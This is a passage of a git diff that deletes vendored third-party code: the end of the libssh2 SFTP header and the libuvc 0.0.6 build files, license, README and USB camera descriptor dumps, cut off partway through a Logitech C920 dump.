-#define libssh2_sftp_opendir(sftp, path) \
-    libssh2_sftp_open_ex((sftp), (path), strlen(path), 0, 0, \
-                         LIBSSH2_SFTP_OPENDIR)
-
-LIBSSH2_API ssize_t libssh2_sftp_read(LIBSSH2_SFTP_HANDLE *handle,
-                                      char *buffer, size_t buffer_maxlen);
-
-LIBSSH2_API int libssh2_sftp_readdir_ex(LIBSSH2_SFTP_HANDLE *handle, \
-                                        char *buffer, size_t buffer_maxlen,
-                                        char *longentry,
-                                        size_t longentry_maxlen,
-                                        LIBSSH2_SFTP_ATTRIBUTES *attrs);
-#define libssh2_sftp_readdir(handle, buffer, buffer_maxlen, attrs)      \
-    libssh2_sftp_readdir_ex((handle), (buffer), (buffer_maxlen), NULL, 0, \
-                            (attrs))
-
-LIBSSH2_API ssize_t libssh2_sftp_write(LIBSSH2_SFTP_HANDLE *handle,
-                                       const char *buffer, size_t count);
-LIBSSH2_API int libssh2_sftp_fsync(LIBSSH2_SFTP_HANDLE *handle);
-
-LIBSSH2_API int libssh2_sftp_close_handle(LIBSSH2_SFTP_HANDLE *handle);
-#define libssh2_sftp_close(handle) libssh2_sftp_close_handle(handle)
-#define libssh2_sftp_closedir(handle) libssh2_sftp_close_handle(handle)
-
-LIBSSH2_API void libssh2_sftp_seek(LIBSSH2_SFTP_HANDLE *handle, size_t offset);
-LIBSSH2_API void libssh2_sftp_seek64(LIBSSH2_SFTP_HANDLE *handle,
-                                     libssh2_uint64_t offset);
-#define libssh2_sftp_rewind(handle) libssh2_sftp_seek64((handle), 0)
-
-LIBSSH2_API size_t libssh2_sftp_tell(LIBSSH2_SFTP_HANDLE *handle);
-LIBSSH2_API libssh2_uint64_t libssh2_sftp_tell64(LIBSSH2_SFTP_HANDLE *handle);
-
-LIBSSH2_API int libssh2_sftp_fstat_ex(LIBSSH2_SFTP_HANDLE *handle,
-                                      LIBSSH2_SFTP_ATTRIBUTES *attrs,
-                                      int setstat);
-#define libssh2_sftp_fstat(handle, attrs) \
-    libssh2_sftp_fstat_ex((handle), (attrs), 0)
-#define libssh2_sftp_fsetstat(handle, attrs) \
-    libssh2_sftp_fstat_ex((handle), (attrs), 1)
-
-/* Miscellaneous Ops */
-LIBSSH2_API int libssh2_sftp_rename_ex(LIBSSH2_SFTP *sftp,
-                                       const char *source_filename,
-                                       unsigned int srouce_filename_len,
-                                       const char *dest_filename,
-                                       unsigned int dest_filename_len,
-                                       long flags);
-#define libssh2_sftp_rename(sftp, sourcefile, destfile) \
-    libssh2_sftp_rename_ex((sftp), (sourcefile), strlen(sourcefile), \
-                           (destfile), strlen(destfile),                \
-                           LIBSSH2_SFTP_RENAME_OVERWRITE | \
-                           LIBSSH2_SFTP_RENAME_ATOMIC | \
-                           LIBSSH2_SFTP_RENAME_NATIVE)
-
-LIBSSH2_API int libssh2_sftp_unlink_ex(LIBSSH2_SFTP *sftp,
-                                       const char *filename,
-                                       unsigned int filename_len);
-#define libssh2_sftp_unlink(sftp, filename) \
-    libssh2_sftp_unlink_ex((sftp), (filename), strlen(filename))
-
-LIBSSH2_API int libssh2_sftp_fstatvfs(LIBSSH2_SFTP_HANDLE *handle,
-                                      LIBSSH2_SFTP_STATVFS *st);
-
-LIBSSH2_API int libssh2_sftp_statvfs(LIBSSH2_SFTP *sftp,
-                                     const char *path,
-                                     size_t path_len,
-                                     LIBSSH2_SFTP_STATVFS *st);
-
-LIBSSH2_API int libssh2_sftp_mkdir_ex(LIBSSH2_SFTP *sftp,
-                                      const char *path,
-                                      unsigned int path_len, long mode);
-#define libssh2_sftp_mkdir(sftp, path, mode) \
-    libssh2_sftp_mkdir_ex((sftp), (path), strlen(path), (mode))
-
-LIBSSH2_API int libssh2_sftp_rmdir_ex(LIBSSH2_SFTP *sftp,
-                                      const char *path,
-                                      unsigned int path_len);
-#define libssh2_sftp_rmdir(sftp, path) \
-    libssh2_sftp_rmdir_ex((sftp), (path), strlen(path))
-
-LIBSSH2_API int libssh2_sftp_stat_ex(LIBSSH2_SFTP *sftp,
-                                     const char *path,
-                                     unsigned int path_len,
-                                     int stat_type,
-                                     LIBSSH2_SFTP_ATTRIBUTES *attrs);
-#define libssh2_sftp_stat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_STAT, \
-                         (attrs))
-#define libssh2_sftp_lstat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_LSTAT, \
-                         (attrs))
-#define libssh2_sftp_setstat(sftp, path, attrs) \
-    libssh2_sftp_stat_ex((sftp), (path), strlen(path), LIBSSH2_SFTP_SETSTAT, \
-                         (attrs))
-
-LIBSSH2_API int libssh2_sftp_symlink_ex(LIBSSH2_SFTP *sftp,
-                                        const char *path,
-                                        unsigned int path_len,
-                                        char *target,
-                                        unsigned int target_len, int link_type);
-#define libssh2_sftp_symlink(sftp, orig, linkpath) \
-    libssh2_sftp_symlink_ex((sftp), (orig), strlen(orig), (linkpath), \
-                            strlen(linkpath), LIBSSH2_SFTP_SYMLINK)
-#define libssh2_sftp_readlink(sftp, path, target, maxlen) \
-    libssh2_sftp_symlink_ex((sftp), (path), strlen(path), (target), (maxlen), \
-    LIBSSH2_SFTP_READLINK)
-#define libssh2_sftp_realpath(sftp, path, target, maxlen) \
-    libssh2_sftp_symlink_ex((sftp), (path), strlen(path), (target), (maxlen), \
-                            LIBSSH2_SFTP_REALPATH)
-
-#ifdef __cplusplus
-} /* extern "C" */
-#endif
-
-#endif /* LIBSSH2_SFTP_H */
diff --git a/thirdparty/libuvc-0.0.6/.gitignore b/thirdparty/libuvc-0.0.6/.gitignore
deleted file mode 100644
index 5f97a27..0000000
--- a/thirdparty/libuvc-0.0.6/.gitignore
+++ /dev/null
@@ -1,2 +0,0 @@
-# Build directory (recommended location)
-build/
diff --git a/thirdparty/libuvc-0.0.6/.travis.yml b/thirdparty/libuvc-0.0.6/.travis.yml
deleted file mode 100644
index fe27da4..0000000
--- a/thirdparty/libuvc-0.0.6/.travis.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-sudo: false
-language: cpp
-compiler:
- - gcc
- - clang
-addons:
- apt:
-  packages:
-   - libusb-1.0-0-dev
-   - libjpeg-dev
-before_script:
- - mkdir build
- - cd build
- - cmake ..
-script:
- - make
diff --git a/thirdparty/libuvc-0.0.6/CMakeLists.txt b/thirdparty/libuvc-0.0.6/CMakeLists.txt
deleted file mode 100644
index 9252224..0000000
--- a/thirdparty/libuvc-0.0.6/CMakeLists.txt
+++ /dev/null
@@ -1,118 +0,0 @@
-cmake_minimum_required(VERSION 2.8)
-project(libuvc)
-
-if (NOT CMAKE_BUILD_TYPE)
-  message(STATUS "No build type selected, default to Release")
-  set(CMAKE_BUILD_TYPE "Release" CACHE STRING "" FORCE)
-endif ()
-
-if (NOT CMAKE_BUILD_TARGET)
-  message(STATUS "No target type selected, default to both shared and static library")
-  set(CMAKE_BUILD_TARGET "Both" CACHE STRING "" FORCE)
-endif()
-
-set(libuvc_VERSION_MAJOR 0)
-set(libuvc_VERSION_MINOR 0)
-set(libuvc_VERSION_PATCH 6)
-set(libuvc_VERSION ${libuvc_VERSION_MAJOR}.${libuvc_VERSION_MINOR}.${libuvc_VERSION_PATCH})
-
-set(libuvc_DESCRIPTION "A cross-platform library for USB video devices")
-set(libuvc_URL "https://github.com/ktossell/libuvc")
-
-find_package(PkgConfig)
-pkg_check_modules(LIBUSB libusb-1.0)
-
-include(GNUInstallDirs)
-
-SET(CMAKE_C_FLAGS_DEBUG "-g -DUVC_DEBUGGING")
-
-SET(INSTALL_CMAKE_DIR "${CMAKE_INSTALL_PREFIX}/lib/cmake/libuvc" CACHE PATH
-	"Installation directory for CMake files")
-
-SET(SOURCES src/ctrl.c src/ctrl-gen.c src/device.c src/diag.c
-           src/frame.c src/init.c src/stream.c
-           src/misc.c)
-
-include_directories(
-  ${libuvc_SOURCE_DIR}/include
-  ${libuvc_BINARY_DIR}/include
-  ${LIBUSB_INCLUDE_DIRS}
-)
-
-message(WARNING "libuvc will not support JPEG decoding.")
-
-if(${CMAKE_BUILD_TARGET} MATCHES "Shared")
-  set(BUILD_UVC_SHARED TRUE)
-elseif(${CMAKE_BUILD_TARGET} MATCHES "Static")
-  set(BUILD_UVC_STATIC TRUE)
-elseif(${CMAKE_BUILD_TARGET} MATCHES "Both")
-  set(BUILD_UVC_SHARED TRUE)
-  set(BUILD_UVC_STATIC TRUE)
-else()
-  message( FATAL_ERROR "Invalid build type ${CMAKE_BUILD_TARGET}" )
-endif()
-
-if(BUILD_UVC_SHARED)
-  add_library(uvc SHARED ${SOURCES})
-  list(APPEND UVC_TARGETS uvc)
-endif()
-
-if(BUILD_UVC_STATIC)
-  add_library(uvc_static STATIC ${SOURCES})
-  set_target_properties(uvc_static PROPERTIES OUTPUT_NAME uvc)
-  list(APPEND UVC_TARGETS uvc_static)
-endif()
-
-configure_file(include/libuvc/libuvc_config.h.in
-  ${PROJECT_BINARY_DIR}/include/libuvc/libuvc_config.h @ONLY)
-
-foreach(target_name ${UVC_TARGETS})
-  set_target_properties(${target_name} PROPERTIES
-    PUBLIC_HEADER "include/libuvc/libuvc.h;${libuvc_BINARY_DIR}/include/libuvc/libuvc_config.h" )
-endforeach()
-
-if(BUILD_UVC_SHARED)
-  if(JPEG_FOUND)
-    target_link_libraries (uvc ${JPEG_LINK_FLAGS})
-  endif(JPEG_FOUND)
-
-  target_link_libraries(uvc ${LIBUSB_LIBRARIES})
-
-  #add_executable(test src/test.c)
-  #target_link_libraries(test uvc ${LIBUSB_LIBRARIES} opencv_highgui
-  #  opencv_core)
-endif()
-
-install(TARGETS ${UVC_TARGETS}
-    EXPORT libuvcTargets
-  LIBRARY DESTINATION "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}"
-  ARCHIVE DESTINATION "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}"
-  PUBLIC_HEADER DESTINATION "${CMAKE_INSTALL_PREFIX}/include/libuvc"
-)
-
-export(TARGETS ${UVC_TARGETS}
-  FILE "${PROJECT_BINARY_DIR}/libuvcTargets.cmake")
-export(PACKAGE libuvc)
-
-set(CONF_INCLUDE_DIR "${CMAKE_INSTALL_PREFIX}/include")
-set(CONF_LIBRARY_DIR "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}")
-set(CONF_LIBRARY "${CMAKE_INSTALL_PREFIX}/lib/${CMAKE_LIBRARY_ARCHITECTURE}/${CMAKE_SHARED_LIBRARY_PREFIX}uvc${CMAKE_SHARED_LIBRARY_SUFFIX}")
-
-configure_file(libuvcConfig.cmake.in ${PROJECT_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/libuvcConfig.cmake)
-
-configure_file(libuvcConfigVersion.cmake.in ${PROJECT_BINARY_DIR}/libuvcConfigVersion.cmake @ONLY)
-
-configure_file(libuvc.pc.in ${PROJECT_BINARY_DIR}/libuvc.pc @ONLY)
-
-install(FILES
-  "${PROJECT_BINARY_DIR}${CMAKE_FILES_DIRECTORY}/libuvcConfig.cmake"
-  "${PROJECT_BINARY_DIR}/libuvcConfigVersion.cmake"
-  DESTINATION "${INSTALL_CMAKE_DIR}")
-
-install(EXPORT libuvcTargets
-  DESTINATION "${INSTALL_CMAKE_DIR}")
-
-install(FILES
-  "${PROJECT_BINARY_DIR}/libuvc.pc"
-  DESTINATION "${CMAKE_INSTALL_LIBDIR}/pkgconfig"
-)
diff --git a/thirdparty/libuvc-0.0.6/LICENSE.txt b/thirdparty/libuvc-0.0.6/LICENSE.txt
deleted file mode 100644
index 4acc5dd..0000000
--- a/thirdparty/libuvc-0.0.6/LICENSE.txt
+++ /dev/null
@@ -1,31 +0,0 @@
-Software License Agreement (BSD License)
-
-Copyright (C) 2010-2015 Ken Tossell
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions
-are met:
-
- * Redistributions of source code must retain the above copyright
-   notice, this list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above
-   copyright notice, this list of conditions and the following
-   disclaimer in the documentation and/or other materials provided
-   with the distribution.
- * Neither the name of the author nor other contributors may be
-   used to endorse or promote products derived from this software
-   without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE.
diff --git a/thirdparty/libuvc-0.0.6/README.md b/thirdparty/libuvc-0.0.6/README.md
deleted file mode 100644
index 399441a..0000000
--- a/thirdparty/libuvc-0.0.6/README.md
+++ /dev/null
@@ -1,26 +0,0 @@
-`libuvc` is a cross-platform library for USB video devices, built atop `libusb`.
-It enables fine-grained control over USB video devices exporting the standard USB Video Class
-(UVC) interface, enabling developers to write drivers for previously unsupported devices,
-or just access UVC devices in a generic fashion.
-
-## Getting and Building libuvc
-
-Prerequisites: You will need `libusb` and [CMake](http://www.cmake.org/) installed.
-
-To build, you can just run these shell commands:
-
-    git clone https://github.com/ktossell/libuvc
-    cd libuvc
-    mkdir build
-    cd build
-    cmake ..
-    make && sudo make install
-
-and you're set! If you want to change the build configuration, you can edit `CMakeCache.txt`
-in the build directory, or use a CMake GUI to make the desired changes.
-
-## Developing with libuvc
-
-The documentation for `libuvc` can currently be found at https://int80k.com/libuvc/doc/.
-
-Happy hacking!
diff --git a/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt b/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt
deleted file mode 100644
index e367025..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/isight_imac.txt
+++ /dev/null
@@ -1,228 +0,0 @@
-
-Bus 001 Device 007: ID 05ac:8501 Apple, Inc. Built-in iSight [Micron]
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x05ac Apple, Inc.
-  idProduct          0x8501 Built-in iSight [Micron]
-  bcdDevice            1.89
-  iManufacturer           1 Micron
-  iProduct                2 Built-in iSight
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          267
-    bNumInterfaces          2
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              100mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           49
-        dwClockFrequency       13.500000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                16
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  1
-        bmControls           0x00000000
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x00000039
-          Brightness
-          Saturation
-          Sharpness
-          Gamma
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0008  1x 8 bytes
-        bInterval              10
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            14
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         1
-        wTotalLength                      155
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                3
-        guidFormat                            {55595659-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass           14 Video
-  bDeviceSubClass         2 Video Streaming
-  bDeviceProtocol         0 
-  bMaxPacketSize0         8
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt b/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt
deleted file mode 100644
index 62d0337..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/isight_macbook.txt
+++ /dev/null
@@ -1,228 +0,0 @@
-
-Bus 001 Device 010: ID 05ac:8501 Apple, Inc. Built-in iSight [Micron]
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x05ac Apple, Inc.
-  idProduct          0x8501 Built-in iSight [Micron]
-  bcdDevice            1.89
-  iManufacturer           1 Micron
-  iProduct                2 Built-in iSight
-  iSerial                 0 
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength          267
-    bNumInterfaces          2
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              100mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength           49
-        dwClockFrequency       13.500000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                16
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  1
-        bmControls           0x00000000
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier          0
-        bControlSize            2
-        bmControls     0x00000039
-          Brightness
-          Saturation
-          Sharpness
-          Gamma
-        iProcessing             0 
-        bmVideoStandards     0x 9
-          None
-          SECAM - 625/50
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               2
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x81  EP 1 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0008  1x 8 bytes
-        bInterval              10
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            14
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         1
-        wTotalLength                      155
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                3
-        guidFormat                            {55595659-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass           14 Video
-  bDeviceSubClass         2 Video Streaming
-  bDeviceProtocol         0 
-  bMaxPacketSize0         8
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt b/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt
deleted file mode 100644
index 2fbe69c..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt
+++ /dev/null
@@ -1,1817 +0,0 @@
-
-Bus 001 Device 018: ID 046d:082d Logitech, Inc. HD Pro Webcam C920
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x046d Logitech, Inc.
-  idProduct          0x082d HD Pro Webcam C920
-  bcdDevice            0.11
-  iManufacturer           0 
-  iProduct                2 HD Pro Webcam C920
-  iSerial                 1 E1CA2A7F
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength         3452
-    bNumInterfaces          4
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              500mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
